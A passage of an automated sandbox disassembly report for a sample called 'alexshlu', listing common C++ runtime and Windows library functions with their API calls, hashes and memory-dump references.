                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strlen
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                        • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                        • Opcode ID: a5d893ce79a1fadb53edded9bd24377064c89dbed39427e3a5f2d0503fbfca26
                                                                                                                                                                                                                                        • Instruction ID: d960e23b26ad10f0d85c9e61692d51e2220c2dd6d9eb20652d863e90956f5eb6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5d893ce79a1fadb53edded9bd24377064c89dbed39427e3a5f2d0503fbfca26
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFC16A35624202CFC714CF28C490B6AB7E1FF8A714F55866CE9598B3A1DB35EC55CB81
                                                                                                                                                                                                                                        Function 002BF2D6 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
                                                                                                                                                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?,?), ref: 002BF395
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?), ref: 002BF3CC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                        • String ID: l#-$utf8
                                                                                                                                                                                                                                        • API String ID: 943130320-2281452077
                                                                                                                                                                                                                                        • Opcode ID: 942fc552a82566256143c68b10d458f2e81e928d72c44b8067a533d0deb8371b
                                                                                                                                                                                                                                        • Instruction ID: 5b113448dbf579c083801ce3e1dfd1a7fb70362d3396743d8c25e54c40040045
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 942fc552a82566256143c68b10d458f2e81e928d72c44b8067a533d0deb8371b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4151E936620306AAD765AF70CE42FE773B8EF04780F14457AFA4997581E7B0E9608B61
                                                                                                                                                                                                                                        Function 002C5521 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C), ref: 002C552E
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C,00000000,?,002BA57C), ref: 002C5538
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 002C5560
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                        • Opcode ID: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
                                                                                                                                                                                                                                        • Instruction ID: 225d2f722c3d3789714d0911abaccba1cb1393c4d7d209de28619e36cb24b7ea
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EE04870AD0309BBDF105F60FC0AF583BB59B10B91F640425F90CE45E0DB71EEA09645
                                                                                                                                                                                                                                        Function 002C28CA Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(DAA4AEFB,00000000,00000000,?), ref: 002C292D
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002C2B7F
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002C2BC5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002C2C68
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                        • Opcode ID: bff20a57131c31a41d331c16d582790cb0494a62b21e41c4a4ac762daf3b0b20
                                                                                                                                                                                                                                        • Instruction ID: ba2a7e5ce04b3080fea6e5149e4bd66503874bdfcb513d47672b6a4231dc547c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bff20a57131c31a41d331c16d582790cb0494a62b21e41c4a4ac762daf3b0b20
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD18975D14248DFCB15CFA8D884AEDBBB4FF08314F28466EE416EB251EA30A955CF50
                                                                                                                                                                                                                                        Function 002B9C53 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                        • Opcode ID: 86a7119ebf7b209ef4b04bc8c16fd4c4a98dd0572747d47d1e034a9268523def
                                                                                                                                                                                                                                        • Instruction ID: 68e4adbc4ec4a64e60bfecb79566390c0940057ce03b9be778ee4e6fd196a2f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86a7119ebf7b209ef4b04bc8c16fd4c4a98dd0572747d47d1e034a9268523def
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1510472A206079FDB25AF51D881BFAB7A4FF44780F14462EEA0647291D735ECE0CB90
                                                                                                                                                                                                                                        Function 002A2850 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A286C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A288A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A28AC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A291A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: fe0b3eb4d8502911e8a8cd5b33819bdb1a999c27a11c5c0f8971baa04de29cbf
                                                                                                                                                                                                                                        • Instruction ID: 1a64d3b20560e961ec3b3cdbcbf85a00a2e31763a2a67cbf7c40c96000970668
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe0b3eb4d8502911e8a8cd5b33819bdb1a999c27a11c5c0f8971baa04de29cbf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121B471D25211DFC710EF1AE849A2A73E0FB55724F05485EE5888B361EF34AD64CF92
                                                                                                                                                                                                                                        Function 002A8290 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A82AC
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A82CA
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A82EC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A835A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 5ff27c2b306d714c5f0dcc07d5288c033ad54f76f8d80eabbe09fa82a26f4e1e
                                                                                                                                                                                                                                        • Instruction ID: 8ea3b6baf7aabab955b1ecf899d10bba734b4ab25c6ed90bbe3e0e8b5418cb74
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff27c2b306d714c5f0dcc07d5288c033ad54f76f8d80eabbe09fa82a26f4e1e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D921B471D192119FCB10EF19E849A2A77E0EF56724F45499EE4888B261EF34AC60CF92
                                                                                                                                                                                                                                        Function 002A6AF0 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A6B0C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A6B2A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A6B4C
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A6BBA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 09b024552d3ae75a45aa768d8ebbe754742966ad9fde1055a792a7fbf7162e42
                                                                                                                                                                                                                                        • Instruction ID: 676c9eceb58dd4e90a35a9e2298833b8da58e22b9e3a86935870e2e6eb9b4b31
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09b024552d3ae75a45aa768d8ebbe754742966ad9fde1055a792a7fbf7162e42
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB21A2719142159FC710EF15E849A5AB3E0EF55728F09485EE5849B391EF34AC60CFA2
                                                                                                                                                                                                                                        Function 002A8380 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A839C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A83BA
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A83DC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A844A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 05db5d4568ed6092700ed81ea39f125f11cd6f45d46a2f81dced248c320f9b66
                                                                                                                                                                                                                                        • Instruction ID: 90fbd68a0b45baf38d414d9fdaba61fd8b2e8501e94a01986590161a7c5f54e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05db5d4568ed6092700ed81ea39f125f11cd6f45d46a2f81dced248c320f9b66
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4821D671D143119FD710EF15E889A2AB3E0EF59724F01885EE4445B361EF34AC64CF92
                                                                                                                                                                                                                                        Function 002A5460 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A547C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A549A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A54BC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A552A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: e6a42bd2ed82c32e4b2afc05723063012d3fff27ed82a3a36575d3b0ea4a0bc8
                                                                                                                                                                                                                                        • Instruction ID: a26684f3c98710f8dd840d19b68bd90862d622042838949730fe49bdc543e937
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6a42bd2ed82c32e4b2afc05723063012d3fff27ed82a3a36575d3b0ea4a0bc8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1219171D156209FC710EF19F949A1AB3A0EF5A724F05485EE4484B361EF34AD60CF92
                                                                                                                                                                                                                                        Function 002C06F6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C075A
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002C0761
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C079B
                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002C07A2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1913693674-0
                                                                                                                                                                                                                                        • Opcode ID: 8a6012e2056a8c9b87e4d9ad9a1e28ddfa048abf4a4fb0f20e40b5af12f16175
                                                                                                                                                                                                                                        • Instruction ID: 80cf232fc251e65f0eafb7a68601cebe25cc1f9c46a41a36dbfe597ab469b40e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a6012e2056a8c9b87e4d9ad9a1e28ddfa048abf4a4fb0f20e40b5af12f16175
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D521AF71A24206EF9B24AF61DCC4E6BB7A9AF103A4750861DF81997251E730FC648FA0
                                                                                                                                                                                                                                        Function 002B0C62 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: cd743915478b4cb4bd5bff5ba637fe09402cd762bb3fa7f17981ac0845be6c13
                                                                                                                                                                                                                                        • Instruction ID: f7a4aebe6ff3a591192760adb73fb0ebead9aa91dd85f7452acaab698cb3973f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd743915478b4cb4bd5bff5ba637fe09402cd762bb3fa7f17981ac0845be6c13
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5221C37162420AAFDB12AFA5DCC59EB7BA8EF043E87104A15F915D7191EB70FC608B90
                                                                                                                                                                                                                                        Function 002C1AEC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 002C1AF4
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B2C
                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B4C
